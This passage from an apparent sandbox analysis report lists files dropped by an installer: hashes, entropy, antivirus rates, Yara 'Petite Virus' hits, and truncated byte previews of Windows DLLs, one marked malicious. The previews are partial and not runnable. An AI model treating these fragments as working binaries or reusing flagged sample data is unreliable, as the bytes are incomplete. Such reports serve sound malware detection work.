                                                                                                                                                                                                                                                                                                                                SHA1:F515F91D62D36DC64ADAA06FA0EF6CF769376BDF
                                                                                                                                                                                                                                                                                                                                SHA-256:E0234AF5F71592C472439536E710BA8105D62DFA68722965DF87FED50BAB1816
                                                                                                                                                                                                                                                                                                                                SHA-512:C9D3C3502601026B6D55A91C583E0BB607BFC695409B984C0561D0CBE7D4F8BD231BC614E0EC1621C287BF0F207017D3E041694320E692FF00BC2220BFA26C26
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.........n.......................................................B....@.........................P...........d.......@............s.......x..........................................................8............................................j..................@..@.rsrc.... ...........l..............@..@petite...............p..............`..`..................8..u...I.x|}...g{...@..ffe.c4.-.Bj..........U.J.`..s.N:`..I@;..B.kbmj..E%2. `....".]&.&.).BB...E..4u'.....Q.......%....V.............5...y....E..q<w.....j...B..O...p....*.X...m...= .X..........4........~~.8.F@.V...6....;?.5..)S.m.9U......^.zO!1o.F.E. ...H=`2...9.(...4).E.!G..;R.1.#.h0..(*..t8..O...Td.d..~...l.a..U...b<../..W....M6...U*G..II.x........>..I[...v.N/.V..3..Y.c...Zh.i..i.....n....M..D....5o."....(.9.+..z...._$t.T...X#\...N....Q%...>U..|....J
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):68876
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.922125376804506
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:q0Z4sz1ZMjCjDIhoLffiedENahBzzxO/JfgmYFGKEvi8TxCI+vHVl:v4MzMjGkhoLfsahS/JYN2vUl
                                                                                                                                                                                                                                                                                                                                MD5:4E35BA785CD3B37A3702E577510F39E3
                                                                                                                                                                                                                                                                                                                                SHA1:A2FD74A68BEFF732E5F3CB0835713AEA8D639902
                                                                                                                                                                                                                                                                                                                                SHA-256:0AFE688B6FCA94C69780F454BE65E12D616C6E6376E80C5B3835E3FA6DE3EB8A
                                                                                                                                                                                                                                                                                                                                SHA-512:1B839AF5B4049A20D9B8A0779FE943A4238C8FBFBF306BC6D3A27AF45C76F6C56B57B2EC8F087F7034D89B5B139E53A626A8D7316BE1374EAC28B06D23E7995D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-CV65T.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...................................D.... ..PE..L.....U]...........!......................... ............................................@.........................P...........d.......@...............................................................................8...............................................................@..@.rsrc...............................@..@.......................................@petite..............................`..`...........................................&MK#H..OEJ..}??...:..$ayf.r7.w(/*.d`...A(7.%p.f.>\..d."..W......[4.0..ZY..... .....~...T....9a+..'.......g!.....l...<..?Y.(..[k.I=....D.....c.*.=.?.8...D>0...#.ZdO..Z...%......X.P..bS..s..=$...m.N........A......A4..J>Wa.N..K.>....2n8.ii.#....y#.J ....i!...a7..Pbl@B.%h0..8RSr.........]..z.\...x..e..5.3.$h. <G.3....-......Q....O0..,......Y}......@...<...t.H).T..! .....ap......Tj.o...0b...`..yX.. g...hzA...b.7.s$M.... ..'....\$...H.\.l.C g..4..(.6@.Q....B(..
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):294926
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.191604766067493
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
                                                                                                                                                                                                                                                                                                                                MD5:C76C9AE552E4CE69E3EB9EC380BC0A42
                                                                                                                                                                                                                                                                                                                                SHA1:EFFEC2973C3D678441AF76CFAA55E781271BD1FB
                                                                                                                                                                                                                                                                                                                                SHA-256:574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
                                                                                                                                                                                                                                                                                                                                SHA-512:7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.........|.....................n.................................c........ ......................`..j7...........................................................................................................................text...8...........................`.P`.data...x...........................@.0..rdata...F.......H..................@.`@/4.......U.......V..................@.0@.bss.........P........................`..edata..j7...`...8...$..............@.0@.idata...............\..............@.0..CRT....,............b..............@.0..tls.................d..............@.0..reloc...............f..............@.0B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):39304
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.819409739152795
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:i5GGx+OZPWuGdoiwUpPLH7IN3x1eW0kIAJbfT13MMnahRlmftuohQf:i5DxDPWMApPLsNhkVkI6R3TnalauoQ
                                                                                                                                                                                                                                                                                                                                MD5:C7A50ACE28DDE05B897E000FA398BBCE
                                                                                                                                                                                                                                                                                                                                SHA1:33DA507B06614F890D8C8239E71D3D1372E61DAA
                                                                                                                                                                                                                                                                                                                                SHA-256:F02979610F9BE2F267AA3260BB3DF0F79EEEB6F491A77EBBE719A44814602BCC
                                                                                                                                                                                                                                                                                                                                SHA-512:4CD7F851C7778C99AFED492A040597356F1596BD81548C803C45565975CA6F075D61BC497FCE68C6B4FEDC1D0B5FD0D84FEAA187DC5E149F4E8E44492D999358
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."b...........!.........x.......P.......................................`.......Z....@.........................PR.......Q..d....0..0............}......D........................................................Q..8.................................... .......t..................@..@.rsrc.... ...0.......v..............@..@petite.......P.......z..............`..`......................p..k..K..i{..\.H..'.|w.t...\..dkB%..i.cX...`*B...m.X..A.NU.i.I. J.I....x-.e2n.IA.2.:..2G5Z/.+(8w.S<...`ML........!..%+.r.s.1.~.D...]......U..q3.....9..?y.>j.E.T...Y..D..>..aJ......P^Y..w?.9w.,...+C^.[....|..'.....7..F%..A.....)..b.)8.2Q`.v.F=.."S*..{z...z-H=....L_....RM..s......H2P1a....[..i. 2..~.?...+R... .m(.I..X...H.g.Z..i..G.?.(......e.:.B......fh......gl.x.Z......I>..#....Hgv.;g.@ l.$(...0.........l.>.p..z;A.@...*4v..x.U.gU..Bqqb..6.x...D.....cIE(5m.g}J..
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):149845
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.893881970959476
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:y0z4JQHu5EvSA/JqiK2s6g+hUCQiMVQ623hi3JKz8KQP6ZwhQrNrbZ:yUju5GY7l+CCYVQ62YUzXQiqhQrJbZ
                                                                                                                                                                                                                                                                                                                                MD5:526E02E9EB8953655EB293D8BAC59C8F
                                                                                                                                                                                                                                                                                                                                SHA1:7CA6025602681EF6EFDEE21CD11165A4A70AA6FE
                                                                                                                                                                                                                                                                                                                                SHA-256:E2175E48A93B2A7FA25ACC6879F3676E04A0C11BB8CDFD8D305E35FD9B5BBBB4
                                                                                                                                                                                                                                                                                                                                SHA-512:053EB66D17E5652A12D5F7FAF03F02F35D1E18146EE38308E39838647F91517F8A9DC0B7A7748225F2F48B8F0347B0A33215D7983E85FCA55EF8679564471F0B
                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-HI55A.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...................................D.... ..PE..L....r.[...........!....U....D............... ............................... ............@.........................P...........d............................N..........................................................8............................................@..................@..@.rsrc................B..............@..@.......................................@petite..U.......U....F..............`..`.....................................5....`K...=1.;;..s}....3500.z.<..]goR.lVO..C..j...........O......9#f.S.$1.b.D.8...VX....sb .A.%I......B.........R...Z5.............y......_W.0.!..T..nT.V..J..s.1`..V...Cb.2x0......0B...4...D.`...!.>[7..^;w'.u"W/...).P.m...P.......qF<.~1..T.>F.F.Rr.`...N....3$...w.L..P..SQP]C^.....2...%5.v...3.a`.k....q.0.o..A......k.....B..P.h.fy..jyb...<t$.%c-...<9.1#2.7./0.j.o#~...,!fuJ.M..a...(...0@.........,..t.3d"qva....fm.=.....]....s...z}-X..3................y>.!......g..E
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1059
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.1208137218866945
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
                                                                                                                                                                                                                                                                                                                                MD5:B7EDCC6CB01ACE25EBD2555CF15473DC
                                                                                                                                                                                                                                                                                                                                SHA1:2627FF03833F74ED51A7F43C55D30B249B6A0707
                                                                                                                                                                                                                                                                                                                                SHA-256:D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
                                                                                                                                                                                                                                                                                                                                SHA-512:962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7910
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.931925007191986
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:piDl1jKrGer007ia6abHX0d/aeHeN+VPHIJQxNiJCl9AK0f:IDJ9aDb30dCe+4PHIJrJCl9AK0f
                                                                                                                                                                                                                                                                                                                                MD5:1268DEA570A7511FDC8E70C1149F6743
                                                                                                                                                                                                                                                                                                                                SHA1:1D646FC69145EC6A4C0C9CAD80626AD40F22E8CD
                                                                                                                                                                                                                                                                                                                                SHA-256:F266DBA7B23321BF963C8D8B1257A50E1467FAAAB9952EF7FFED1B6844616649
                                                                                                                                                                                                                                                                                                                                SHA-512:E19F0EA39FF7AA11830AF5AAD53343288C742BE22299C815C84D24251FA2643B1E0401AF04E5F9B25CAB29601EA56783522DDB06C4195C6A609804880BAE9E9B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-JNRFN.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...................................D.... ..PE..L.....V...........!.................p.......0............................................@.........................Pr.......q..d....P.......................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`.........................................|7{M..... ........r B`.Zr..P.........T}.e..YJ...=.X..q.}......b.I...G.....^.d...R..-R.....d_.......K.q.H.A=.-S..,_.....L...........2.............u.u.%...:.q....c.[.....`...\.X..8..B.@L..3.7.q.....)!.- ...D.....p...J...RU..Q.A..[.#&..R.....".+4...px/7..\....4...., ..8...5.hV.>] ....3.-.<..I+.<r..T..H,Q..!..i--..+.Zq.[...H... ...N.8..#...a.x.iU.G..-_..R....Z(cT%.....S.P.U:g?...;....&....@..KI.X.Q..PQ..v..*....{..~..}..f....c..`....Q...q..%......,j.4.Y..)....Cf7..
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):15374
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.192037544202194
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
                                                                                                                                                                                                                                                                                                                                MD5:BEFD36FE8383549246E1FD49DB270C07
                                                                                                                                                                                                                                                                                                                                SHA1:1EF12B568599F31292879A8581F6CD0279F3E92A
                                                                                                                                                                                                                                                                                                                                SHA-256:B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
                                                                                                                                                                                                                                                                                                                                SHA-512:FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0.....f................................b......... ......................p..E.......h...........................................................P@......................................................text...............................`.P`.data...,....0....... ..............@.0..rdata.......@......."..............@.0@/4...........P.......$..............@.0@.bss.........`........................`..edata..E....p......................@.0@.idata..h............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8456
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.767152008521429
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:yxPHUtfhriUVoSoGtyo2xmJ8GbarAtT7/lxjFZnPK0cl:KPehriU3t2IiGbHTxZnPK0cl
                                                                                                                                                                                                                                                                                                                                MD5:19E08B7F7B379A9D1F370E2B5CC622BD
                                                                                                                                                                                                                                                                                                                                SHA1:3E2D2767459A92B557380C5796190DB15EC8A6EA
                                                                                                                                                                                                                                                                                                                                SHA-256:AC97E5492A3CE1689A2B3C25D588FAC68DFF5C2B79FCF4067F2D781F092BA2A1
                                                                                                                                                                                                                                                                                                                                SHA-512:564101A9428A053AA5B08E84586BCBB73874131154010A601FCE8A6FC8C4850C614B4B0A07ACF2A38FD2D4924D835584DB0A8B49EF369E2E450E458AC32CF256
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-LN8F3.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...................................D.... ..PE..L...#.MZ...........!.................p.......0............................................@.........................Pr.......q..d....P..8....................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`..................................................l..a.......1...3W..Z.....H...5.(...$.. .>X9..Fn... ..."j1..........%.7.d...".m...n.ePY......`....I.gYo..UC....Rq(...F......s..8`.I.....i..F.....'......@..-;.........J...Oq...b@...........$.D4E..($.....8':*;.q....[-..{..w....@M....J$..0d..9Q.I^.^y.E..*L_-.x!s.......W.H.R..@.6....MQ.Q8.s.."...!."IX.vM...!e.$%......U.....F.CoI..X.dA...0.Y..r.8.*p...<..M y...8..s....N5<.J....&..`...w..'..\s..%..A.`....s..j.H...X#..R.\..)R3@..X.P.5...G..t.f/..C.b.d...|.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):127669
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.952352167575405
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:kdGUCKL7Wn/OzU2ThapTv773+HMnBasgGlBM:dn/mU8K/3EgNgoM
                                                                                                                                                                                                                                                                                                                                MD5:75C1D7A3BDF1A309C540B998901A35A7
                                                                                                                                                                                                                                                                                                                                SHA1:B06FEEAC73D496C435C66B9B7FF7514CBE768D84
                                                                                                                                                                                                                                                                                                                                SHA-256:6303F205127C3B16D9CF1BDF4617C96109A03C5F2669341FBC0E1D37CD776B29
                                                                                                                                                                                                                                                                                                                                SHA-512:8D2BBB7A7AD34529117C8D5A122F4DAF38EA684AACD09D5AD0051FA41264F91FD5D86679A57913E5ADA917F94A5EF693C39EBD8B465D7E69EF5D53EF941AD2EE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-M3SQC.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...................................D.... ..PE..L....O?\...........!.................`.......................................p............@..........................b.......a.......0..@...........................................................................<b..H.................................... ..........................@..@.rsrc........0......................@..@......... ...@.........................@petite.......`......................`..`..........................................fE...nj.:<...n...1..}..r..". .S(...#!............7..5.Q..0..}.. .....^y...U...@..3.........&.lp(.pt.a......!..`@C.O3G7..."\..w.1u.$4..1h...M...K6.L...L..~.w...b2x-.......9k".....".V\............o..................qO&.......4(."0.Zy....2..Y..Z..:2.XM..D....a&..&.L,......./+......c<...^.2.x0..H.618....Q.Q.5.%...Z1.I.......a...q-}.0..D....o.!.....O.......B....# O.!....cY5.#...n.`..1...r!.)].:...m.f.....x....N"t.j..l.....:/...,.v........8F.N...X..j.R......"...&...
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):11532
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.219753259626605
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:Dqv1jf+0vAe7Dl+JTGxuK5Rbfh70Il9MWbzq6UWkE0FGemexbiJi8TK0Q2:m9KIAeNgTGxu2Jfh1DMSzqKkvFGLJi85
                                                                                                                                                                                                                                                                                                                                MD5:073F34B193F0831B3DD86313D74F1D2A
                                                                                                                                                                                                                                                                                                                                SHA1:3DF5592532619C5D9B93B04AC8DBCEC062C6DD09
                                                                                                                                                                                                                                                                                                                                SHA-256:C5EEC9CD18A344227374F2BC1A0D2CE2F1797CFFD404A0A28CF85439D15941E9
                                                                                                                                                                                                                                                                                                                                SHA-512:EEFD583D1F213E5A5607C2CFBAED39E07AEC270B184E61A1BA0B5EF67ED7AC5518B5C77345CA9BD4F39D2C86FCD261021568ED14945E7A7541ADF78E18E64B0C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-M5NA9.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...................................D.... ..PE..L.....V...........!.........(...............P............................................@.........................P...........d....p..8...................82.........................................................8....................................`.......$..................@..@.rsrc........p.......&..............@..@.......................................@petite...............*..............`..`....................................#..L....y......"......O/..M...C.A.&:.e.i..l....CP...g.AK..S;.lf.?.g....].k.U.G.Y.J.",......%....:ge.D x.P }}..Tih.g......%G.Iy.j...\..*.S...s..$..........o..y..........,.........-..X.....v.M1..*'...5R.4..8k!..q.=*BVST<..M.E.._T.p...K.r....C.HEO....\..%%,I....>'.L.ct..{..I..l.Y#f Tk*...:bH?.....G..Y.p..Q.....z/R.h>8....]S.....p.c/.m..6tc.d..(..{...=w4.w.^..d.....^..Tp.....Z.*.).Z."...&.-...o...xD+0.L+!...X.%?)+.P..Z.......P..F..P.".._.%9.^T;(..Y.>.. .....re
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):123406
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.263889638223575
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:hnPkU1t2P2hHV5JG1YBBAUBEd8+poyez9djcx2/8s6UJqfxX+1XOAhbKzb3+d:xPu21IYyCTToE6c+6e+d
                                                                                                                                                                                                                                                                                                                                MD5:B49ECFA819479C3DCD97FAE2A8AB6EC6
                                                                                                                                                                                                                                                                                                                                SHA1:1B8D47D4125028BBB025AAFCA1759DEB3FC0C298
                                                                                                                                                                                                                                                                                                                                SHA-256:B9D5317E10E49AA9AD8AD738EEBE9ACD360CC5B20E2617E5C0C43740B95FC0F2
                                                                                                                                                                                                                                                                                                                                SHA-512:18617E57A76EFF6D95A1ED735CE8D5B752F1FB550045FBBEDAC4E8E67062ACD7845ADC6FBE62238C383CED5E01D7AA4AB8F968DC442B67D62D2ED712DB67DC13
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................R.......d>..........p....@...........................@......^........ ...............................@.4...................................................................................|.@.@............................text....Q.......R..................`.P`.data...\....p.......V..............@.@..rdata...a.......b...X..............@.`@/4..................................@.0@.bss.....c>...........................`..idata..4.....@.....................@.0..CRT....4.....@.....................@.0..tls..........@.....................@.0.................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):13838
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.173769974589746
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
                                                                                                                                                                                                                                                                                                                                MD5:9C55B3E5ED1365E82AE9D5DA3EAEC9F2
                                                                                                                                                                                                                                                                                                                                SHA1:BB3D30805A84C6F0803BE549C070F21C735E10A9
                                                                                                                                                                                                                                                                                                                                SHA-256:D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
                                                                                                                                                                                                                                                                                                                                SHA-512:EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........6.........#.........2...............0....@m.................................Z........ ......................p..J.......h............................................................@......................................................text...............................`.P`.data...,....0......................@.0..rdata.......@......................@.0@/4...........P......................@.0@.bss.........`........................`..edata..J....p.......(..............@.0@.idata..h............*..............@.0..CRT....,............0..............@.0..tls.................2..............@.0..reloc...............4..............@.0B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):18966
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.620111275837424
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
                                                                                                                                                                                                                                                                                                                                MD5:F0F973781B6A66ADF354B04A36C5E944
